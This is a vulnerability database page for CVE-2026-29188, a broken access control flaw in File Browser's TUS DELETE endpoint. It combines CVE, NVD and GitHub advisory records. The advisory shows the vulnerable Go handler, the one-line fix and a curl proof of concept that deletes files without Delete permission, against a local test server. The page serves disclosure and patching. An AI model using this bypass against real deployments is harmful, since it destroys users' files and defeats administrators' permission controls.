Vulnerability-Lookup

CVE-2026-29188 (GCVE-0-2026-29188)

Vulnerability from cvelistv5 – Published: 2026-03-05 20:57 – Updated: 2026-03-06 10:41

Title

File Browser: TUS Delete Endpoint Bypasses Delete Permission Check

Summary

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.1, a broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected. This issue has been patched in version 2.61.1.

Severity ?

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE

CWE-732 - Incorrect Permission Assignment for Critical Resource
CWE-284 - Improper Access Control

Assigner

GitHub_M

References

URL

Tags

	https://github.com/filebrowser/filebrowser/securi…	x_refsource_CONFIRM
	https://github.com/filebrowser/filebrowser/commit…	x_refsource_MISC
	https://github.com/filebrowser/filebrowser/releas…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	filebrowser	filebrowser	Affected: < 2.61.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-29188",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-06T10:40:45.426964Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-06T10:41:10.751Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "filebrowser",
          "vendor": "filebrowser",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.61.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.1, a broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected. This issue has been patched in version 2.61.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-732",
              "description": "CWE-732: Incorrect Permission Assignment for Critical Resource",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-05T20:57:57.329Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm"
        },
        {
          "name": "https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f"
        },
        {
          "name": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1"
        }
      ],
      "source": {
        "advisory": "GHSA-79pf-vx4x-7jmm",
        "discovery": "UNKNOWN"
      },
      "title": "File Browser: TUS Delete Endpoint Bypasses Delete Permission Check"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-29188",
    "datePublished": "2026-03-05T20:57:57.329Z",
    "dateReserved": "2026-03-04T14:44:00.714Z",
    "dateUpdated": "2026-03-06T10:41:10.751Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-29188\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-05T21:16:23.097\",\"lastModified\":\"2026-03-10T19:42:36.507\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.1, a broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected. This issue has been patched in version 2.61.1.\"},{\"lang\":\"es\",\"value\":\"File Browser proporciona una interfaz de gesti\u00f3n de archivos dentro de un directorio especificado y puede utilizarse para subir, eliminar, previsualizar, renombrar y editar archivos. Antes de la versi\u00f3n 2.61.1, una vulnerabilidad de control de acceso roto en el endpoint DELETE del protocolo TUS permite a usuarios autenticados con solo permiso de Creaci\u00f3n eliminar archivos y directorios arbitrarios dentro de su alcance, eludiendo la restricci\u00f3n de permiso de Eliminaci\u00f3n prevista. Cualquier despliegue multiusuario donde los administradores restringen expl\u00edcitamente la eliminaci\u00f3n de archivos para ciertos usuarios se ve afectado. Este problema ha sido parcheado en la versi\u00f3n 2.61.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"},{\"lang\":\"en\",\"value\":\"CWE-732\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.61.1\",\"matchCriteriaId\":\"C933E37A-6BEC-42C8-88CC-D8FD69116058\"}]}]}],\"references\":[{\"url\":\"https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-29188\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-06T10:40:45.426964Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-06T10:41:06.817Z\"}}], \"cna\": {\"title\": \"File Browser: TUS Delete Endpoint Bypasses Delete Permission Check\", \"source\": {\"advisory\": \"GHSA-79pf-vx4x-7jmm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"filebrowser\", \"product\": \"filebrowser\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.61.1\"}]}], \"references\": [{\"url\": \"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm\", \"name\": \"https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f\", \"name\": \"https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1\", \"name\": \"https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.1, a broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected. This issue has been patched in version 2.61.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-732\", \"description\": \"CWE-732: Incorrect Permission Assignment for Critical Resource\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-05T20:57:57.329Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-29188\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-06T10:41:10.751Z\", \"dateReserved\": \"2026-03-04T14:44:00.714Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-05T20:57:57.329Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-29188

Vulnerability from fkie_nvd - Published: 2026-03-05 21:16 - Updated: 2026-03-10 19:42

Severity ?

9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f	Patch
security-advisories@github.com	https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1	Release Notes
security-advisories@github.com	https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	filebrowser	filebrowser	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C933E37A-6BEC-42C8-88CC-D8FD69116058",
              "versionEndExcluding": "2.61.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.1, a broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected. This issue has been patched in version 2.61.1."
    },
    {
      "lang": "es",
      "value": "File Browser proporciona una interfaz de gesti\u00f3n de archivos dentro de un directorio especificado y puede utilizarse para subir, eliminar, previsualizar, renombrar y editar archivos. Antes de la versi\u00f3n 2.61.1, una vulnerabilidad de control de acceso roto en el endpoint DELETE del protocolo TUS permite a usuarios autenticados con solo permiso de Creaci\u00f3n eliminar archivos y directorios arbitrarios dentro de su alcance, eludiendo la restricci\u00f3n de permiso de Eliminaci\u00f3n prevista. Cualquier despliegue multiusuario donde los administradores restringen expl\u00edcitamente la eliminaci\u00f3n de archivos para ciertos usuarios se ve afectado. Este problema ha sido parcheado en la versi\u00f3n 2.61.1."
    }
  ],
  "id": "CVE-2026-29188",
  "lastModified": "2026-03-10T19:42:36.507",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-03-05T21:16:23.097",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-284"
        },
        {
          "lang": "en",
          "value": "CWE-732"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-79PF-VX4X-7JMM

Vulnerability from github – Published: 2026-03-04 22:38 – Updated: 2026-03-05 22:50

Summary

File Browser's TUS Delete Endpoint Bypasses Delete Permission Check

Details

Summary

A broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected.

Details

The tusDeleteHandler function in http/tus_handlers.go incorrectly gates the DELETE operation behind Perm.Create instead of Perm.Delete:

// http/tus_handlers.go - tusDeleteHandler (VULNERABLE)
func tusDeleteHandler(cache UploadCache) handleFunc {
    return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
        if r.URL.Path == "/" || !d.user.Perm.Create {  // ← Wrong permission checked
            return http.StatusForbidden, nil
        }
        // ...
        err = d.user.Fs.RemoveAll(r.URL.Path)  // File is deleted

The correct resourceDeleteHandler in http/resource.go properly checks Perm.Delete:

// http/resource.go - resourceDeleteHandler (CORRECT)
func resourceDeleteHandler(fileCache FileCache) handleFunc {
    return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
        if r.URL.Path == "/" || !d.user.Perm.Delete {  // ← Correct permission
            return http.StatusForbidden, nil
        }

This inconsistency means that DELETE /api/tus/{path} and DELETE /api/resources/{path} enforce entirely different permission models for the same underlying filesystem operation. The TUS endpoint was introduced to support resumable uploads (http/tus_handlers.go) and its DELETE handler is intended to cancel in-progress uploads -however, the RemoveAll call permanently removes the file from the filesystem regardless of how the upload was initiated.

Proposed fix:

// http/tus_handlers.go
- if r.URL.Path == "/" || !d.user.Perm.Create {
+ if r.URL.Path == "/" || !d.user.Perm.Delete {

PoC

filebrowser built from latest master (git clone https://github.com/filebrowser/filebrowser)
Tested on: Kali Linux, go version go1.23+

Setup section

# Build and initialize
git clone https://github.com/filebrowser/filebrowser
cd filebrowser
go build -o filebrowser .
./filebrowser config init

# Create a test user with Create=true but Delete=false
./filebrowser users add testuser SuperSecurePassword1234 \
  --perm.create=true \
  --perm.delete=false

# Start server
./filebrowser &

POC script steps

Confirm the Delete permission is correctly enforced on the standard endpoint:

TOKEN=$(curl -s -X POST localhost:8080/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"testuser","password":"SuperSecurePassword1234"}')

# Attempt deletion via the standard resource endpoint → should be blocked
curl -s -X DELETE "localhost:8080/api/resources/target.txt" \
  -H "X-Auth: $TOKEN" \
  -w "HTTP Status: %{http_code}\n"

# Expected: HTTP Status: 403

Bypass via the TUS Delete endpoint:

# Initiate a TUS upload to register the file in the upload cache
curl -s -X POST "localhost:8080/api/tus/target.txt" \
  -H "X-Auth: $TOKEN" \
  -H "Upload-Length: 18" \
  -w "HTTP Status: %{http_code}\n"

# Expected: HTTP Status: 201

# Now delete via the TUS endpoint - Perm.Delete is NOT checked
curl -s -X DELETE "localhost:8080/api/tus/target.txt" \
  -H "X-Auth: $TOKEN" \
  -w "HTTP Status: %{http_code}\n"

# Expected: HTTP Status: 204  ← File deleted despite Perm.Delete=false

Observed results:

DELETE /api/resources/target.txt  -->  403 Forbidden      ( permission enforced )
DELETE /api/tus/target.txt            -->   204 No Content    ( permission bypassed )

Impact

This is a broken access control vulnerability (IDOR / permission model bypass). It affects any filebrowser deployment where:

Multiple users share a single instance, and
An administrator has explicitly set Perm.Delete=false for one or more users to restrict destructive operations

An attacker (authenticated user with Perm.Create=true) can permanently delete any file or directory within their assigned scope-including files they did not create - by initiating a TUS upload against the target path and immediately issuing a TUS DELETE request. This completely undermines the intended access control model, as administrators have no reliable way to prevent file deletion for users who retain upload rights.

Severity ?

9.1 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.61.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.61.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29188"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-732"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-04T22:38:01Z",
    "nvd_published_at": "2026-03-05T21:16:23Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nA broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected.\n\n### Details\n\nThe tusDeleteHandler function in http/tus_handlers.go incorrectly gates the DELETE operation behind Perm.Create instead of Perm.Delete:\n\n```go\n// http/tus_handlers.go - tusDeleteHandler (VULNERABLE)\nfunc tusDeleteHandler(cache UploadCache) handleFunc {\n    return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {\n        if r.URL.Path == \"/\" || !d.user.Perm.Create {  // \u2190 Wrong permission checked\n            return http.StatusForbidden, nil\n        }\n        // ...\n        err = d.user.Fs.RemoveAll(r.URL.Path)  // File is deleted\n```\n\nThe correct resourceDeleteHandler in http/resource.go properly checks Perm.Delete:\n\n```go\n// http/resource.go - resourceDeleteHandler (CORRECT)\nfunc resourceDeleteHandler(fileCache FileCache) handleFunc {\n    return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {\n        if r.URL.Path == \"/\" || !d.user.Perm.Delete {  // \u2190 Correct permission\n            return http.StatusForbidden, nil\n        }\n```\n\nThis inconsistency means that DELETE /api/tus/{path} and DELETE /api/resources/{path} enforce entirely different permission models for the same underlying filesystem operation. The TUS endpoint was introduced to support resumable uploads (http/tus_handlers.go) and its DELETE handler is intended to cancel in-progress uploads -however, the RemoveAll call permanently removes the file from the filesystem regardless of how the upload was initiated.\n\n### Proposed fix:\n\n```go\n// http/tus_handlers.go\n- if r.URL.Path == \"/\" || !d.user.Perm.Create {\n+ if r.URL.Path == \"/\" || !d.user.Perm.Delete {\n```\n\n### PoC\n\n- filebrowser built from latest master (git clone https://github.com/filebrowser/filebrowser) \n- Tested on: Kali Linux, go version go1.23+\n\n### Setup section\n\n```bash\n# Build and initialize\ngit clone https://github.com/filebrowser/filebrowser\ncd filebrowser\ngo build -o filebrowser .\n./filebrowser config init\n\n# Create a test user with Create=true but Delete=false\n./filebrowser users add testuser SuperSecurePassword1234 \\\n  --perm.create=true \\\n  --perm.delete=false\n\n# Start server\n./filebrowser \u0026\n```\n\n### POC script steps\n\n1. Confirm the Delete permission is correctly enforced on the standard endpoint:\n\n```bash\nTOKEN=$(curl -s -X POST localhost:8080/api/login \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"username\":\"testuser\",\"password\":\"SuperSecurePassword1234\"}\u0027)\n\n# Attempt deletion via the standard resource endpoint \u2192 should be blocked\ncurl -s -X DELETE \"localhost:8080/api/resources/target.txt\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 403\n```\n\n2. Bypass via the TUS Delete endpoint:\n\n```bash\n# Initiate a TUS upload to register the file in the upload cache\ncurl -s -X POST \"localhost:8080/api/tus/target.txt\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Upload-Length: 18\" \\\n  -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 201\n\n# Now delete via the TUS endpoint - Perm.Delete is NOT checked\ncurl -s -X DELETE \"localhost:8080/api/tus/target.txt\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -w \"HTTP Status: %{http_code}\\n\"\n\n# Expected: HTTP Status: 204  \u2190 File deleted despite Perm.Delete=false\n```\n\n**Observed results:**\n```\nDELETE /api/resources/target.txt  --\u003e  403 Forbidden      ( permission enforced )\nDELETE /api/tus/target.txt            --\u003e   204 No Content    ( permission bypassed )\n```\n\n### Impact\nThis is a broken access control vulnerability (IDOR / permission model bypass). It affects any filebrowser deployment where:\n\n- Multiple users share a single instance, and\n- An administrator has explicitly set Perm.Delete=false for one or more users to restrict destructive operations\n\nAn attacker (authenticated user with Perm.Create=true) can permanently delete any file or directory within their assigned scope-including files they did not create - by initiating a TUS upload against the target path and immediately issuing a TUS DELETE request. This completely undermines the intended access control model, as administrators have no reliable way to prevent file deletion for users who retain upload rights.",
  "id": "GHSA-79pf-vx4x-7jmm",
  "modified": "2026-03-05T22:50:21Z",
  "published": "2026-03-04T22:38:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29188"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "File Browser\u0027s TUS Delete Endpoint Bypasses Delete Permission Check"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-29188 (GCVE-0-2026-29188)

FKIE_CVE-2026-29188

GHSA-79PF-VX4X-7JMM

Summary

Details

Proposed fix:

PoC

Setup section

POC script steps

Impact

Tags

Sightings

Nomenclature